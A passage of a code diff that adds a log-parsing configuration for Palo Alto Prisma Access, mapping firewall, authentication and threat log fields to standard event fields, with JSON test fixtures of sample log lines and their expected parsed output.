+          destination.bytes: "{{parsed_event.message.BytesReceived or parsed_event.message.out}}"
+          destination.domain: "{{parsed_description.message.dst_domain}}"
+      - set:
+          destination.ip: "{{parsed_event.message.DestinationAddress}}"
+        filter: "{{parsed_event.message.DestinationAddress| is_ipaddress}}"
+
+      - set:
+          destination.ip: "{{parsed_event.message.dst}}"
+        filter: "{{parsed_event.message.dst | is_ipaddress}}"
+
+      - set:
+          destination.ip: "{{parsed_description.message.dst}}"
+        filter: "{{parsed_description.message.dst  | is_ipaddress}}"
+
+      - set:
+          destination.nat.ip: "{{parsed_event.message.destinationTranslatedAddress}}"
+        filter: "{{parsed_event.message.destinationTranslatedAddress | is_ipaddress}}"
+
+      - set:
+          destination.nat.ip: "{{parsed_event.message.NATDestinationIP}}"
+        filter: "{{parsed_event.message.NATDestinationIP | is_ipaddress}}"
+
+      - set:
+          destination.nat.port: "{{parsed_event.message.destinationTranslatedPort or parsed_event.message.NATDestinationPort}}"
+        filter: "{{(parsed_event.message.get('destinationTranslatedPort') != None and (parsed_event.message.destinationTranslatedPort is number or parsed_event.message.destinationTranslatedPort.isdigit())) or (parsed_event.message.get('NATDestinationPort') != None and (parsed_event.message.NATDestinationPort is number or parsed_event.message.NATDestinationPort.isdigit()))}}"
+
+      - set:
+          destination.packets: "{{parsed_event.message.PanOSPacketsReceived or parsed_event.message.pkts_received}}"
+        filter: "{{(parsed_event.message.get('PanOSPacketsReceived') != None and (parsed_event.message.PanOSPacketsReceived is number or parsed_event.message.PanOSPacketsReceived.isdigit())) or (parsed_event.message.get('pkts_received') != None and (parsed_event.message.pkts_received is number or parsed_event.message.pkts_received.isdigit()))}}"
+
+      - set:
+          event.duration: "{{parsed_event.message.ElapsedTimeInSec or parsed_event.message.SessionDuration}}"
+        filter: "{{(parsed_event.message.get('ElapsedTimeInSec') != None and (parsed_event.message.ElapsedTimeInSec is number or parsed_event.message.ElapsedTimeInSec.isdigit())) or (parsed_event.message.get('SessionDuration') != None and (parsed_event.message.SessionDuration is number or parsed_event.message.SessionDuration.isdigit()))}}"
+
+      - set:
+          network.packets: "{{parsed_event.message.Packets or parsed_event.message.PacketsTotal}}"
+        filter: "{{ (parsed_event.message.get('PacketsTotal') != None and (parsed_event.message.PacketsTotal is number or parsed_event.message.PacketsTotal.isdigit())) or (parsed_event.message.get('Packets') != None and (parsed_event.message.Packets is number or parsed_event.message.Packets.isdigit())) }}"
+
+      - set:
+          event.reason: "{{parsed_event.message.reason or parsed_event.message.EventDescription or parsed_event.message.PanOSConnectionError or parsed_event.message.Description}}"
+
+      - set:
+          event.reason: "{{ parsed_threat.message.threat_description }}"
+          event.code: "{{ parsed_threat.message.threat_code }}"
+        filter: "{{ parsed_threat.get('message') != None }}"
+
+      - set:
+          destination.port: "{{parsed_event.message.DestinationPort or parsed_event.message.dpt or parsed_description.message.dport}}"
+          destination.user.name: "{{parsed_event.message.duser or parsed_event.message.DestinationUser}}"
+          email.from.address: "{{parsed_event.message.Sender}}"
+          email.subject: "{{parsed_event.message.Subject}}"
+          email.to.address: "{{parsed_event.message.Recipient}}"
+          event.action: "{{parsed_event.message.act or parsed_event.message.Action or parsed_description.message.action}}"
+          event.timezone: "{{parsed_event.message.dtz}}"
+          event.dataset: "{{parsed_event.message.DeviceEventClassID|lower or parsed_event.message.Type|lower or parsed_event.message.LogType|lower}}"
+          event.module: "{{parsed_description.message.module}}"
+          host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}"
+          host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost}}"
+          host.id: "{{parsed_event.message.deviceExternalId}}"
+          host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}"
+          host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}"
+          host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}"
+          host.os.type: "{{parsed_event.message.PanOSEndpointOSType}}"
+          host.type: "{{parsed_event.message.PanOSSourceDeviceCategory}}"
+          http.request.method: "{{parsed_event.message.HttpMethod or parsed_event.message.HTTPMethod}}"
+          http.request.referrer: "{{parsed_event.message.Referer}}"
+          log.hostname: "{{parsed_event.message.DeviceName or parsed_event.message.dvchost}}"
+          log.level: "{{parsed_event.message.VendorSeverity}}"
+          log.logger: "{{parsed_event.message.DeviceEventClassID|lower or parsed_event.message.Type|lower or parsed_event.message.LogType|lower}}"
+          network.application: "{{parsed_event.message.Application or parsed_event.message.app}}"
+          network.bytes: "{{parsed_event.message.Bytes or parsed_event.message.PanOSBytes}}"
+          network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}"
+          network.protocol: "{{parsed_description.message.proto}}"
+          network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}"
+          observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}"
+          observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}"
+          observer.ingress.interface.name: "{{parsed_description.message.intf}}"
+          observer.product: "PAN-OS"
+          observer.vendor: "{{parsed_event.message.DeviceVendor}}"
+          observer.type: "{{parsed_event.message.DeviceProduct}}"
+          observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}"
+          observer.serial_number: "{{parsed_event.message.DeviceSN}}"
+          observer.name: "{{parsed_event.message.DeviceName}}"
+          rule.name: "{{parsed_event.message.Rule}}"
+          rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}"
+          source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}"
+
+      - set:
+          file.path: "{{parsed_event.message.URLFilename}}"
+          file.name: "{{parsed_event.message.FileName or parsed_event.message.URLFilename or parsed_description.message.filename}}"
+        filter: "{{final.action.type != 'url'}}"
+
+      - set:
+          url.original: "{{parsed_event.message.URL}}"
+
+      - set:
+          url.original: "{{parsed_event.message.FileName or parsed_event.message.URLFilename}}"
+          url.domain: '{{final.url.original.split("/")[0].split(":")[0]}}'
+          destination.domain: '{{final.url.original.split("/")[0].split(":")[0]}}'
+          url.port: '{{final.url.original.split("/")[0].split(":")[1]}}'
+          url.path: '{{final.url.original.split("?")[0].split("/")[1:] | join("/")}}'
+          url.query: '{{final.url.original.split("?")[1]}}'
+        filter: "{{final.action.type == 'url'}}"
+
+      - delete:
+          - url.original
+        filter: "{{final.action.type == 'url'}}"
+
+      - set:
+          source.ip: "{{parsed_event.message.PublicIPv4}}"
+        filter: "{{parsed_event.message.PublicIPv4 | is_ipaddress}}"
+
+      - set:
+          source.ip: "{{parsed_event.message.PublicIP}}"
+        filter: "{{parsed_event.message.PublicIP | is_ipaddress}}"
+
+      - set:
+          source.ip: "{{parsed_event.message.SourceAddress}}"
+        filter: "{{parsed_event.message.SourceAddress | is_ipaddress}}"
+
+      - set:
+          source.ip: "{{parsed_event.message.SourceIP}}"
+        filter: "{{parsed_event.message.SourceIP | is_ipaddress}}"
+
+      - set:
+          source.ip: "{{parsed_event.message.src}}"
+        filter: "{{parsed_event.message.src | is_ipaddress}}"
+
+      - set:
+          source.ip: "{{parsed_description.message.src}}"
+        filter: "{{parsed_description.message.src | is_ipaddress}}"
+
+      - set:
+          source.ip: "{{parsed_event.message.PublicIP}}"
+        filter: "{{parsed_event.message.PublicIP | is_ipaddress}}"
+
+      - set:
+          source.ip: "{{parsed_event.message.SourceAddress}}"
+        filter: "{{parsed_event.message.SourceAddress | is_ipaddress}}"
+
+      - set:
+          source.ip: "{{parsed_event.message.SourceIP}}"
+        filter: "{{parsed_event.message.SourceIP | is_ipaddress}}"
+
+      - set:
+          source.ip: "{{parsed_event.message.src}}"
+        filter: "{{parsed_event.message.src | is_ipaddress}}"
+
+      - set:
+          source.ip: "{{parsed_description.message.src}}"
+        filter: "{{parsed_description.message.src | is_ipaddress}}"
+
+      - set:
+          source.nat.ip: "{{parsed_event.message.NATSource}}"
+        filter: "{{parsed_event.message.NATSource | is_ipaddress}}"
+
+      - set:
+          source.nat.ip: "{{parsed_event.message.NATSourceIP}}"
+        filter: "{{parsed_event.message.NATSourceIP | is_ipaddress}}"
+
+      - set:
+          source.nat.ip: "{{parsed_event.message.sourceTranslatedAddress}}"
+        filter: "{{parsed_event.message.sourceTranslatedAddress | is_ipaddress}}"
+
+      - set:
+          destination.nat.ip: "{{parsed_event.message.NATDestination}}"
+        filter: "{{parsed_event.message.NATDestination | is_ipaddress}}"
+
+      - set:
+          network.forwarded_ip: "{{parsed_event.message.get('X-Forwarded-For')}}"
+        filter: "{{ parsed_event.message.get('X-Forwarded-For') | is_ipaddress }}"
+
+      - set:
+          network.forwarded_ip: "{{parsed_event.message.XFFAddress or parsed_event.message.xff}}"
+        filter: "{{parsed_event.message.XFFAddress | is_ipaddress or parsed_event.message.xff | is_ipaddress}}"
+
+      - set:
+          source.geo.country_iso_code: "{{parsed_event.message.SourceRegion or parsed_event.message.SourceLocation}}"
+        filter: "{{parsed_event.message.SourceLocation | length == 2 or parsed_event.message.PanOSSourceLocation | length == 2}}"
+      - set:
+          destination.geo.country_iso_code: "{{parsed_event.message.PanOSDestinationLocation or parsed_event.message.DestinationLocation}}"
+        filter: "{{parsed_event.message.DestinationLocation | length == 2 or parsed_event.message.PanOSDestinationLocation | length == 2}}"
+      - set:
+          action.name: "{{parsed_event.message.EventID or parsed_event.message.PanOSEventIDValue}}"
+        filter: '{{final.action.name == null and (parsed_event.message.EventID not in [null, "0"] or parsed_event.message.PanOSEventIDValue not in [null, "0"])}}'
+
+      - set:
+          source.nat.port: "{{parsed_event.message.NATSourcePort or parsed_event.message.sourceTranslatedPort}}"
+          source.packets: "{{parsed_event.message.PanOSPacketsSent or parsed_event.message.pkts_sent}}"
+          source.port: "{{parsed_event.message.SourcePort or parsed_event.message.spt}}"
+          source.user.name: "{{parsed_event.message.suser or parsed_event.message.PanOSSourceUserName or parsed_event.message.SourceUserName}}"
+          user_agent.name: "{{parsed_event.message.UserAgent}}"
+          user_agent.os.name: "{{parsed_event.message.ClientOS}}"
+          user_agent.os.version: "{{parsed_event.message.ClientOSVersion}}"
+          user.name: "{{parsed_event.message.User or parsed_event.message.suser or parsed_event.message.PanOSSourceUserName or parsed_description.message.user}}"
+          paloalto.ContentType: "{{parsed_event.message.ContentType | replace('\x00', '')}}"
+          paloalto.DGHierarchyLevel1: "{{parsed_event.message.DGHierarchyLevel1 | replace('\x00', '')}}"
+          paloalto.DGHierarchyLevel2: "{{parsed_event.message.DGHierarchyLevel2 | replace('\x00', '')}}"
+          paloalto.DGHierarchyLevel3: "{{parsed_event.message.DGHierarchyLevel3 | replace('\x00', '')}}"
+          paloalto.DGHierarchyLevel4: "{{parsed_event.message.DGHierarchyLevel4 | replace('\x00', '')}}"
+          paloalto.DirectionOfAttack: "{{parsed_event.message.DirectionOfAttack | replace('\x00', '')}}"
+          paloalto.EventID: "{{parsed_event.message.EventID | replace('\x00', '')}}"
+          paloalto.PanOSContainerName: "{{parsed_event.message.PanOSContainerName | replace('\x00', '')}}"
+          paloalto.PanOSContainerNameSpace: "{{parsed_event.message.PanOSContainerNameSpace | replace('\x00', '')}}"
+          paloalto.PanOSDestinationDeviceCategory: "{{parsed_event.message.PanOSDestinationDeviceCategory | replace('\x00', '')}}"
+          paloalto.PanOSDestinationDeviceHost: "{{parsed_event.message.PanOSDestinationDeviceHost | replace('\x00', '')}}"
+          paloalto.PanOSDestinationDeviceMac: "{{parsed_event.message.PanOSDestinationDeviceMac | replace('\x00', '')}}"
+          paloalto.PanOSDestinationDeviceModel: "{{parsed_event.message.PanOSDestinationDeviceModel | replace('\x00', '')}}"
+          paloalto.PanOSDestinationDeviceOSFamily: "{{parsed_event.message.PanOSDestinationDeviceOSFamily | replace('\x00', '')}}"
+          paloalto.PanOSDestinationDeviceOSVersion: "{{parsed_event.message.PanOSDestinationDeviceOSVersion | replace('\x00', '')}}"
+          paloalto.PanOSDestinationDeviceProfile: "{{parsed_event.message.PanOSDestinationDeviceProfile | replace('\x00', '')}}"
+          paloalto.PanOSDestinationDeviceVendor: "{{parsed_event.message.PanOSDestinationDeviceVendor | replace('\x00', '')}}"
+          paloalto.PanOSDestinationEDL: "{{parsed_event.message.PanOSDestinationEDL | replace('\x00', '')}}"
+          paloalto.PanOSDestinationUUID: "{{parsed_event.message.PanOSDestinationUUID | replace('\x00', '')}}"
+          paloalto.PanOSEndpointSerialNumber: "{{parsed_event.message.PanOSEndpointSerialNumber | replace('\x00', '')}}"
+          paloalto.PanOSGPHostID: "{{parsed_event.message.PanOSGPHostID | replace('\x00', '')}}"
+          paloalto.PanOSHASessionOwner: "{{parsed_event.message.PanOSHASessionOwner | replace('\x00', '')}}"
+          paloalto.PanOSQuarantineReason: "{{parsed_event.message.PanOSQuarantineReason | replace('\x00', '')}}"
+          paloalto.PanOSSDWANCluster: "{{parsed_event.message.PanOSSDWANCluster | replace('\x00', '')}}"
+          paloalto.PanOSSDWANClusterType: "{{parsed_event.message.PanOSSDWANClusterType | replace('\x00', '')}}"
+          paloalto.PanOSSDWANDeviceType: "{{parsed_event.message.PanOSSDWANDeviceType | replace('\x00', '')}}"
+          paloalto.PanOSSDWANPolicyName: "{{parsed_event.message.PanOSSDWANPolicyName | replace('\x00', '')}}"
+          paloalto.PanOSSDWANSite: "{{parsed_event.message.PanOSSDWANSite | replace('\x00', '')}}"
+          paloalto.PanOSSessionStartTime: "{{parsed_event.message.PanOSSessionStartTime | replace('\x00', '')}}"
+          paloalto.PanOSSourceDeviceHost: "{{parsed_event.message.PanOSSourceDeviceHost | replace('\x00', '')}}"
+          paloalto.PanOSSourceDeviceModel: "{{parsed_event.message.PanOSSourceDeviceModel | replace('\x00', '')}}"
+          paloalto.PanOSSourceDeviceProfile: "{{parsed_event.message.PanOSSourceDeviceProfile | replace('\x00', '')}}"
+          paloalto.PanOSSourceDeviceVendor: "{{parsed_event.message.PanOSSourceDeviceVendor | replace('\x00', '')}}"
+          paloalto.PanOSSourceDynamicAddressGroup: "{{parsed_event.message.PanOSSourceDynamicAddressGroup | replace('\x00', '')}}"
+          paloalto.PanOSSourceEDL: "{{parsed_event.message.PanOSSourceEDL | replace('\x00', '')}}"
+          paloalto.PanOSSourceLocation: "{{parsed_event.message.PanOSSourceLocation | replace('\x00', '')}}"
+          paloalto.PanOSSourceUUID: "{{parsed_event.message.PanOSSourceUUID | replace('\x00', '')}}"
+          paloalto.PanOSThreatCategory: "{{parsed_event.message.PanOSThreatCategory | replace('\x00', '')}}"
+          paloalto.PanOSThreatID: "{{parsed_event.message.PanOSThreatID | replace('\x00', '')}}"
+          paloalto.PanOSVirtualSystemName: "{{parsed_event.message.PanOSVirtualSystemName | replace('\x00', '')}}"
+          paloalto.PanOSX-Forwarded-ForIP: "{{parsed_event.message['PanOSX-Forwarded-ForIP'] | replace('\x00', '')}}"
+          paloalto.URLCategory: "{{parsed_event.message.URLCategory | replace('x00', '')}}"
+          paloalto.VirtualLocation: "{{parsed_event.message.VirtualLocation | replace('x00', '')}}"
+          paloalto.VirtualSystemID: "{{parsed_event.message.VirtualSystemID | replace('x00', '')}}"
+          paloalto.VirtualSystemName: "{{parsed_event.message.VirtualSystemName | replace('x00', '')}}"
+          paloalto.Threat_ContentType: "{{parsed_event.message.Subtype}}"
+          paloalto.connection.stage: "{{parsed_event.message.Stage or parsed_event.message.PanOSStage}}"
+          paloalto.authentication.method: "{{parsed_event.message.AuthMethod or parsed_event.message.PanOSAuthMethod}}"
+          paloalto.connection.method: "{{parsed_event.message.ConnectionMethod or parsed_event.message.PanOSConnectionMethod}}"
+          paloalto.endpoint.serial_number: "{{parsed_event.message.EndpointSerialNumber or parsed_event.message.PanOSEndpointSerialNumber}}"
+          paloalto.threat.id: "{{parsed_event.message.ThreatID or parsed_event.message.PanOSThreatID or parsed_threat.message.threat_code}}"
+          paloalto.threat.name: "{{parsed_threat.message.threat_description}}"
+      - set:
+          source.user.name: "{{parsed_event.message.SourceUser}}"
+          user.name: "{{parsed_event.message.SourceUser}}"
+        filter: '{{parsed_event.message.SourceUser.startswith("x-fwd-for") == False}}'
+
+      - set:
+          user.email: "{{parsed_event.message.SourceUser}}"
+        filter: "{{parsed_event.message.SourceUser != None and '@' in parsed_event.message.SourceUser}}"
+
+      - set:
+          paloalto.dns.category: "{{parsed_event.message.DNSCategory}}"
+          dns.question.type: "{{parsed_event.message.RecordType}}"
+          dns.resolved_ip: "{{parsed_event.message.DNSResponse}}"
+
+      - set:
+          paloalto.source.region: "{{parsed_event.message.SourceRegion}}"
+        filter: "{{parsed_event.message.Subtype == 'globalprotect'}}"
+
+      - set:
+          paloalto.source.private.ip: "{{parsed_event.message.PrivateIPv4}}"
+        filter: "{{parsed_event.message.PrivateIPv4 | is_ipaddress}}"
+
+      - set:
+          paloalto.DirectionOfAttack: "{{parsed_event.message.DirectionOfAttack}}"
+          paloalto.threat.category: "{{parsed_event.message.ThreatCategory}}"
+
+      - set:
+          threat.indicator.name: "{{parsed_event.message.URL}}"
+
+  set_finalize_user_name:
+    actions:
+      - set:
+          user.domain: '{{final.user.name.split("\\") | first}}'
+          user.name: '{{final.user.name.split("\\") | last}}'
+        filter: '{{final.user.name != null and "\\" in final.user.name}}'
+      - set:
+          user.domain: '{{final.user.email.split("@") | first}}'
+          user.name: '{{final.user.email.split("@") | last}}'
+        filter: '{{final.user.email != null and "@" in final.user.email}}'
+      - set:
+          source.user.domain: '{{final.source.user.name.split("\\") | first}}'
+          source.user.name: '{{final.source.user.name.split("\\") | last}}'
+        filter: '{{final.source.user.name != null and "\\" in final.source.user.name}}'
+      - set:
+          destination.user.domain: '{{final.destination.user.name.split("\\") | first}}'
+          destination.user.name: '{{final.destination.user.name.split("\\") | last}}'
+        filter: '{{final.destination.user.name != null and "\\" in final.destination.user.name}}'
+
+  set_category_fields:
+    actions:
+      - set:
+          event.category: ["network"]
+          event.type: ["info"]
+      - set:
+          event.category: ["authentication"]
+          event.type: ["info"]
+        filter: '{{final.log.logger in ["auth", "userid"] or (final.log.logger == "system" and parsed_event.message.Subtype == "auth")}}'
+      - set:
+          event.category: ["host"]
+          event.type: ["info"]
+        filter: '{{final.log.logger == "system" and parsed_event.message.Subtype == "general"}}'
+      - set:
+          event.category: ["session"]
+          event.type: ["info"]
+        filter: '{{final.log.logger == "globalprotect"}}'
+      - translate:
+        dictionary:
+          "login": ["start"]
+          "connected": ["start"]
+        mapping:
+          paloalto.connection.stage: event.type
+        fallback: ["info"]
+        filter: '{{final.log.logger == "globalprotect"}}'
+      - translate:
+        dictionary:
+          login: ["start"]
+          logout: ["end"]
+          "auth-success": ["start"]
+        mapping:
+          parsed_event.message.Subtype: event.type
+          parsed_event.message.Name: event.type
+          parsed_event.message.EventID: event.type
+        filter: '{{final.log.logger in ["userid", "system"]}}'
+      - translate:
+        dictionary:
+          spyware: ["malware"]
+          virus: ["malware"]
+          wildfire-virus: ["malware"]
+          vulnerability: ["vulnerability"]
+          file: ["file"]
+          data: ["file"]
+          flood: ["network"]
+          packet: ["network"]
+          scan: ["network"]
+          url: ["network"]
+          wildfire: ["malware"]
+        mapping:
+          parsed_event.message.Name: event.category
+          parsed_event.message.Subtype: event.category
+        filter: '{{final.log.logger == "threat"}}'
+      - translate:
+        dictionary:
+          "start": ["start"]
+          "end": ["end"]
+          "drop": ["denied"]
+          "denied": ["denied"]
+          "deny": ["denied"]
+          "allow": ["allowed"]
+        mapping:
+          parsed_event.message.act: event.type
+          parsed_event.message.Subtype: event.type
+        filter: '{{final.log.logger == "traffic"}}'
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/User_id_1_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/User_id_1_csv.json
new file mode 100644
index 000000000..08c69d61f
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/User_id_1_csv.json	
@@ -0,0 +1,59 @@
+{
+  "input": {
+    "message": "1,2020/12/04 16:00:02,016401002222,USERID,login,2305,2020/12/04 16:00:02,vsys,1.2.3.4,user1,srv1.example.local,0,1,12000,0,0,active-directory,,968683723,0x8000000000000000,12,0,0,0,,hostexample,1,,2020/12/04 16:00:02,1,0x80,user1"
+  },
+  "expected": {
+    "message": "1,2020/12/04 16:00:02,016401002222,USERID,login,2305,2020/12/04 16:00:02,vsys,1.2.3.4,user1,srv1.example.local,0,1,12000,0,0,active-directory,,968683723,0x8000000000000000,12,0,0,0,,hostexample,1,,2020/12/04 16:00:02,1,0x80,user1",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "userid",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2020-12-04T16:00:02Z",
+    "action": {
+      "type": "login"
+    },
+    "destination": {
+      "port": 0
+    },
+    "log": {
+      "hostname": "hostexample",
+      "logger": "userid"
+    },
+    "observer": {
+      "name": "hostexample",
+      "product": "PAN-OS",
+      "serial_number": "016401002222"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "12",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "0",
+      "Threat_ContentType": "login",
+      "VirtualLocation": "vsys",
+      "VirtualSystemID": "1"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "user1"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "port": 0
+    },
+    "user": {
+      "name": "user1"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/User_id_2_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/User_id_2_csv.json
new file mode 100644
index 000000000..539963216
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/User_id_2_csv.json	
@@ -0,0 +1,59 @@
+{
+  "input": {
+    "message": "1,2020/12/04 16:00:02,01640103000,USERID,login,2200,2020/12/04 16:00:02,vsys,10.0.0.2,user1,srv1.example.local,0,1,13000,0,0,active-directory,,968700000,0x8000000000000000,12,0,0,0,,hostname_example,1,,2020/12/04 16:00:02,1,0x0,user1"
+  },
+  "expected": {
+    "message": "1,2020/12/04 16:00:02,01640103000,USERID,login,2200,2020/12/04 16:00:02,vsys,10.0.0.2,user1,srv1.example.local,0,1,13000,0,0,active-directory,,968700000,0x8000000000000000,12,0,0,0,,hostname_example,1,,2020/12/04 16:00:02,1,0x0,user1",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "userid",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2020-12-04T16:00:02Z",
+    "action": {
+      "type": "login"
+    },
+    "destination": {
+      "port": 0
+    },
+    "log": {
+      "hostname": "hostname_example",
+      "logger": "userid"
+    },
+    "observer": {
+      "name": "hostname_example",
+      "product": "PAN-OS",
+      "serial_number": "01640103000"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "12",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "0",
+      "Threat_ContentType": "login",
+      "VirtualLocation": "vsys",
+      "VirtualSystemID": "1"
+    },
+    "related": {
+      "ip": [
+        "10.0.0.2"
+      ],
+      "user": [
+        "user1"
+      ]
+    },
+    "source": {
+      "address": "10.0.0.2",
+      "ip": "10.0.0.2",
+      "port": 0
+    },
+    "user": {
+      "name": "user1"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/auth_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/auth_cef.json
new file mode 100644
index 000000000..ff12d8db6
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/auth_cef.json	
@@ -0,0 +1,76 @@
+{
+  "input": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|AUTH|Radius|3|ProfileToken=xxxxx dtz=UTC rt=Feb 28 2021 18:20:54 deviceExternalId=xxxxxxxxxxxxx PanOSConfigVersion=10.0 PanOSAuthenticatedUserDomain=paloaltonetwork PanOSAuthenticatedUserName=xxxxx PanOSAuthenticatedUserUUID= PanOSClientTypeName= PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSRuleMatched= start=Feb 28 2021 18:20:40 cs3=vsys1 cs3Label=VirtualLocation c6a2=::ffff:0 c6a2Label=Source IPv6 Address c6a3=::ffff:0 c6a3Label=Destination IPv6 Address duser=paloaltonetwork\\\\xxxxx cs2=paloaltonetwork\\\\xxxxx cs2Label=NormalizeUser fname=Authentication object2 cs4=DC cs4Label=AuthenticationPolicy cnt=33554432 cn2=-5257671089978343424 cn2Label=MFAAuthenticationID PanOSMFAVendor=Symantec VIP cs6=rs-logging cs6Label=LogSetting cs1=deny-attackers cs1Label=AuthServerProfile PanOSAuthenticationDescription=www.something cs5=Unknown cs5Label=ClientType msg=Invalid Certificate cn1=0 cn1Label=AuthFactorNo externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx PanOSVirtualSystemID=1 PanOSAuthenticationProtocol=EAP-TTLS with PAP PanOSRuleMatchedUUID= PanOSTimeGeneratedHighResolution=Feb 28 2021 18:20:41 PanOSSourceDeviceCategory=src_category_list-1 PanOSSourceDeviceProfile=src_profile_list-1 PanOSSourceDeviceModel=src_model_list-1 PanOSSourceDeviceVendor=src_vendor_list-1 PanOSSourceDeviceOSFamily=src_osfamily_list-0 PanOSSourceDeviceOSVersion=src_osversion_list-2 PanOSSourceDeviceHost=src_host_list-0 PanOSSourceDeviceMac=src_mac_list-2 PanOSAuthCacheServiceRegion= PanOSUserAgentString= PanOSSessionID="
+  },
+  "expected": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|AUTH|Radius|3|ProfileToken=xxxxx dtz=UTC rt=Feb 28 2021 18:20:54 deviceExternalId=xxxxxxxxxxxxx PanOSConfigVersion=10.0 PanOSAuthenticatedUserDomain=paloaltonetwork PanOSAuthenticatedUserName=xxxxx PanOSAuthenticatedUserUUID= PanOSClientTypeName= PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSRuleMatched= start=Feb 28 2021 18:20:40 cs3=vsys1 cs3Label=VirtualLocation c6a2=::ffff:0 c6a2Label=Source IPv6 Address c6a3=::ffff:0 c6a3Label=Destination IPv6 Address duser=paloaltonetwork\\\\xxxxx cs2=paloaltonetwork\\\\xxxxx cs2Label=NormalizeUser fname=Authentication object2 cs4=DC cs4Label=AuthenticationPolicy cnt=33554432 cn2=-5257671089978343424 cn2Label=MFAAuthenticationID PanOSMFAVendor=Symantec VIP cs6=rs-logging cs6Label=LogSetting cs1=deny-attackers cs1Label=AuthServerProfile PanOSAuthenticationDescription=www.something cs5=Unknown cs5Label=ClientType msg=Invalid Certificate cn1=0 cn1Label=AuthFactorNo externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx PanOSVirtualSystemID=1 PanOSAuthenticationProtocol=EAP-TTLS with PAP PanOSRuleMatchedUUID= PanOSTimeGeneratedHighResolution=Feb 28 2021 18:20:41 PanOSSourceDeviceCategory=src_category_list-1 PanOSSourceDeviceProfile=src_profile_list-1 PanOSSourceDeviceModel=src_model_list-1 PanOSSourceDeviceVendor=src_vendor_list-1 PanOSSourceDeviceOSFamily=src_osfamily_list-0 PanOSSourceDeviceOSVersion=src_osversion_list-2 PanOSSourceDeviceHost=src_host_list-0 PanOSSourceDeviceMac=src_mac_list-2 PanOSAuthCacheServiceRegion= PanOSUserAgentString= PanOSSessionID=",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "auth",
+      "severity": 3,
+      "start": "2021-02-28T18:20:40Z",
+      "timezone": "UTC",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2021-02-28T18:20:54Z",
+    "action": {
+      "type": "radius"
+    },
+    "destination": {
+      "user": {
+        "domain": "paloaltonetwork",
+        "name": "xxxxx"
+      }
+    },
+    "host": {
+      "hostname": "xxxxx",
+      "id": "xxxxxxxxxxxxx",
+      "mac": "src_mac_list-2",
+      "name": "xxxxx",
+      "os": {
+        "family": "src_osfamily_list-0",
+        "version": "src_osversion_list-2"
+      },
+      "type": "src_category_list-1"
+    },
+    "log": {
+      "hostname": "xxxxx",
+      "logger": "auth"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "Unknown"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "DC"
+        }
+      },
+      "product": "PAN-OS",
+      "type": "LF",
+      "vendor": "Palo Alto Networks",
+      "version": "2.0"
+    },
+    "paloalto": {
+      "PanOSSourceDeviceHost": "src_host_list-0",
+      "PanOSSourceDeviceModel": "src_model_list-1",
+      "PanOSSourceDeviceProfile": "src_profile_list-1",
+      "PanOSSourceDeviceVendor": "src_vendor_list-1",
+      "VirtualLocation": "vsys1"
+    },
